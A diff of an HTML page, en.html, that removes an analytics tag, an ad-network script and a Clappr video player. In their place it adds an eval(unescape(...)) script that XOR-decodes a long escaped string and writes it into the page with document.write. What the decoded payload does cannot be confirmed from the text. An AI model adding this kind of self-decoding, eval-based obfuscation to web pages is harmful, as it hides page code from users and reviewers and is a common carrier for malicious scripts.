--- a/en.html
+++ b/en.html
@@ -1,43 +1,16 @@
 <html>
-<head>  <!-- Global site tag (gtag.js) - Google Analytics -->
-<script async src="https://www.googletagmanager.com/gtag/js?id=UA-143372155-2"></script>
-<script>
-  window.dataLayer = window.dataLayer || [];
-  function gtag(){dataLayer.push(arguments);}
-  gtag('js', new Date());
-
-  gtag('config', 'UA-143372155-2');
-</script><script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',4989511,document.body||document.documentElement)</script>
+<head>
 </head>
 <body>
 
-<script type="text/javascript" src="https://cdn.jsdelivr.net/clappr/latest/clappr.min.js"></script>
-<script type="text/javascript" src="https://cdn.jsdelivr.net/clappr.level-selector/latest/level-selector.min.js"></script>
-
-  <div id="player"></div>
-
-<script>
-	
-var playerElement = document.getElementById("player");
-var player = new Clappr.Player({
-      mediacontrol: {
-      seekbar: "#567",
-      buttons: "#567"
-      },
- height: "200",
- width: "100%",
-autoPlay:false,
-  plugins: {
-    'core': [LevelSelector]
-    },
-	xhrSetup: function(xhr, url) {
-		xhr.withCredentials = false;
-	}
-});
-player.attachTo(playerElement);
-player.load({source: 'https://e7384f46cb09.eu-central-1.playback.live-video.net/api/video/v1/eu-central-1.922366157501.channel.GOtmfkLbP0bY.m3u8', mimeType: ''});player.play();
-
+<script type="text/javascript">
+<!-- 
+eval(unescape('%66%75%6e%63%74%69%6f%6e%20%6a%66%63%37%33%66%34%63%38%38%62%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%31%30%32%32%39%31%39%33%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%36%30%39%34%37%37%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%35%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));
+eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%6a%66%63%37%33%66%34%63%38%38%62%28%27') + '%34%6a%67%6e%65%3f%0f%03%37%6a%64%5b%58%3a%12%13%31%1e%2e%2f%1d%42%6e%6e%5a%5b%64%12%66%62%6d%66%1c%69%5c%6b%1f%24%65%6c%55%6a%2f%67%68%23%1d%28%12%46%6d%6d%61%6e%68%1d%3e%6f%5b%61%74%66%60%59%69%18%21%20%3f%0a%03%30%68%5e%64%60%6c%68%18%55%66%72%6b%58%1c%68%6d%57%3c%1a%64%6c%66%63%68%37%2c%2d%74%72%7b%2d%65%6d%69%6b%6f%66%6d%5a%65%6e%5c%60%58%65%67%6e%20%56%6c%6a%2c%65%69%5c%6b%2e%62%69%39%6d%57%3e%52%3a%2f%2a%2f%27%2a%35%2a%2f%39%38%2e%2f%1b%3e%31%2a%67%5a%6a%63%68%66%31%0e%07%31%69%58%6d%6d%6f%68%3e%0b%0c%13%1d%70%62%6e%59%6a%7b%2d%58%5b%6c%55%4f%5a%76%66%6a%1d%38%12%76%63%6e%5c%63%7a%2f%5d%5a%68%5a%47%55%70%67%6a%18%7e%7f%1d%54%5e%31%0e%05%12%1f%66%77%6a%57%67%62%68%6f%1c%64%6f%55%66%24%23%75%56%54%69%5e%41%5b%72%60%64%2d%6c%77%6d%6a%2b%5a%6f%64%77%6e%60%60%6b%69%23%35%71%00%03%19%1d%65%69%5c%6b%27%25%62%6d%2b%2f%1d%6b%66%75%1d%3f%55%6b%67%24%27%2d%3e%0e%07%0e%02%1d%1b%6b%6b%5b%65%20%2b%56%6c%6b%67%63%64%22%2e%1f%25%57%3f%21%24%29%2c%28%35%2b%2c%39%34%2f%2a%21%2d%3e%0e%07%31%2d%68%5e%64%60%6c%68%3a%3e%66%58%6f%62%6c%69%39%2a%65%77%6e%5d%66%6c%6c%6b%25%69%21%70%2e%71%20%6c%27%7f%66%2f%6c%6b%59%3e%70%2e%6a%2e%69%63%66%34%69%6d%6b%63%5b%70%66%64%24%25%5c%55%67%5a%2a%73%6d%6f%60%2b%23%72%23%24%62%21%5a%69%6d%67%6f%5f%37%67%63%60%5c%2a%66%22%34%7e%23%25%5f%63%5a%77%6f%63%60%67%2f%5c%6b%67%5a%6f%69%44%60%67%6b%69%61%69%21%24%69%58%6d%6d%6f%68%25%27%2e%2a%65%6d%69%6c%68%35%23%2e%63%59%64%6d%56%60%5c%59%6e%2f%5e%63%6c%2d%68%5f%6b%21%6e%66%6f%2e%63%6e%2b%23%28%33%30%3d%38%2a%2e%21%58%6c%5e%79%6c%67%6e%6c%20%55%6c%5d%72%70%71%5f%63%5a%77%6f%63%60%67%2f%5d%6c%59%76%68%69%6d%68%47%64%69%60%66%6b%69%23%31%2a%67%5a%6a%63%68%66%31%0e%07%31%2d%65%60%55%5b%3e%0f%06%3e%55%6c%5d%72%3e%0e%05%01%01%30%69%5d%64%6c%6d%6d%1d%68%72%6b%69%3c%1a%68%63%7a%67%2c%67%5a%76%5a%6e%57%69%63%6c%6c%14%13%68%6f%58%3f%1b%63%66%6b%6c%69%36%23%22%58%5d%6f%2e%63%6e%56%64%60%63%72%64%21%6f%62%69%2d%58%67%55%6f%6c%6a%29%6e%54%69%62%68%68%2c%5e%6e%58%6c%6c%6e%20%60%62%6b%2f%62%68%1d%30%33%2d%69%5d%64%6c%6d%6d%3f%0f%03%37%67%5a%6a%63%68%66%13%69%76%6d%67%3e%1d%66%64%74%68%29%6c%54%77%5e%68%59%6b%64%62%6b%1a%1c%6d%64%56%3e%1f%65%68%69%6b%67%31%2d%2d%5d%56%61%2f%67%68%58%66%67%6d%75%6a%2e%6a%69%67%2c%5c%61%5b%6d%6b%64%2d%60%67%72%69%6f%2e%6c%66%60%66%5e%66%6e%6a%2d%64%55%67%66%6c%69%2d%61%60%78%64%60%2f%6d%69%6f%66%5c%69%6d%6b%29%61%60%6e%2e%66%67%15%3f%35%2c%69%58%6d%6d%6f%68%3e%0b%0c%00%03%19%1d%30%59%64%78%1f%63%58%3b%14%63%61%5e%72%67%6b%1d%30%33%2d%58%67%78%31%0e%07%0e%02%31%6e%57%69%63%6c%6c%30%00%03%06%0e%02%77%5c%64%1f%6c%60%5f%7d%68%6b%42%61%67%6e%60%60%6b%1c%3f%18%56%62%58%72%6e%67%6f%6f%20%66%67%68%43%6e%68%6e%62%6f%68%3b%74%4d%5b%24%1a%68%6e%54%72%62%6b%1a%22%36%01%01%76%5b%6e%12%63%61%5e%72%67%6b%1b%31%1f%6e%67%71%12%36%61%5e%6d%6c%6b%29%42%63%5b%73%63%64%2b%70%0a%03%1c%1d%1b%12%1f%1c%6f%63%56%6c%5a%5c%6c%6e%69%6d%63%63%32%1c%75%01%0d%1d%19%1d%1c%1d%1b%67%64%67%61%5e%55%65%33%19%1b%19%36%31%3b%19%20%0f%06%12%13%1d%19%1d%1c%5b%70%66%6b%6d%6e%6d%3c%13%1b%1c%36%36%34%1d%01%01%1c%1c%18%12%13%1d%7a%21%0f%03%1b%6a%64%63%65%60%66%3d%1d%1f%2b%2c%2d%1d%2e%0c%02%1c%71%6d%57%69%61%33%1c%1b%2c%22%2f%27%1a%24%01%0d%5a%72%69%6d%4d%67%55%70%32%66%5f%6e%66%66%25%0e%02%1d%1b%62%63%77%65%67%60%66%33%19%70%0f%03%1b%12%1f%1c%25%5d%63%65%66%20%33%1c%50%47%69%75%67%60%4d%69%6f%66%5c%69%6d%6b%58%01%01%1c%1c%18%12%70%21%0a%03%03%75%63%64%4a%67%68%73%62%3d%1d%63%76%6e%58%6f%6d%6e%6e%24%70%6a%65%21%19%76%6a%61%24%12%72%0f%02%07%0d%7b%65%6f%2f%75%62%6f%6a%3a%6a%67%5c%69%61%69%66%5a%60%68%1b%31%1f%66%5b%64%67%68%30%0a%03%03%7e%08%0c%7c%23%31%0b%0c%63%61%5e%72%67%6b%29%55%6b%68%5b%5d%6a%47%6c%21%6d%60%5a%74%69%69%47%60%63%61%68%6f%6d%22%31%0e%05%62%63%5b%73%63%64%21%61%68%5a%58%25%76%67%6e%77%6a%5d%69%3d%1d%20%65%68%69%6b%67%31%2d%2d%63%3b%26%35%2d%67%28%37%5e%54%2f%33%2e%63%79%20%58%62%6f%68%6b%5c%6e%2c%2b%2e%68%6e%54%72%5f%5a%59%60%29%6e%60%76%67%2b%78%6c%59%62%6c%2e%6f%60%66%2e%5b%6c%67%23%79%62%5d%66%6d%2c%71%25%2e%67%77%2b%57%68%6f%6d%6b%5b%61%28%25%2d%33%2a%2e%27%39%37%2e%36%35%36%2b%25%2d%59%64%5f%60%61%66%65%2f%45%4c%6f%61%65%61%40%5e%42%23%5b%56%2f%6f%28%70%3a%26%20%1c%6b%6d%60%66%4d%72%6c%66%35%12%26%25%7f%27%3f%63%61%5e%72%67%6b%29%62%63%5b%73%20%2d%3e%0e%07%0e%02%31%2a%67%5a%6a%63%68%66%31%0e%07%31%2d%5b%6a%56%70%3e%0f%06%3e%22%65%6d%6e%60%3f10229193%33%39%38%36%32%36%37' + unescape('%27%29%29%3b'));
+// -->
 </script>
+<noscript><i>Javascript required</i></noscript>
+
 </body>
 </html>
 
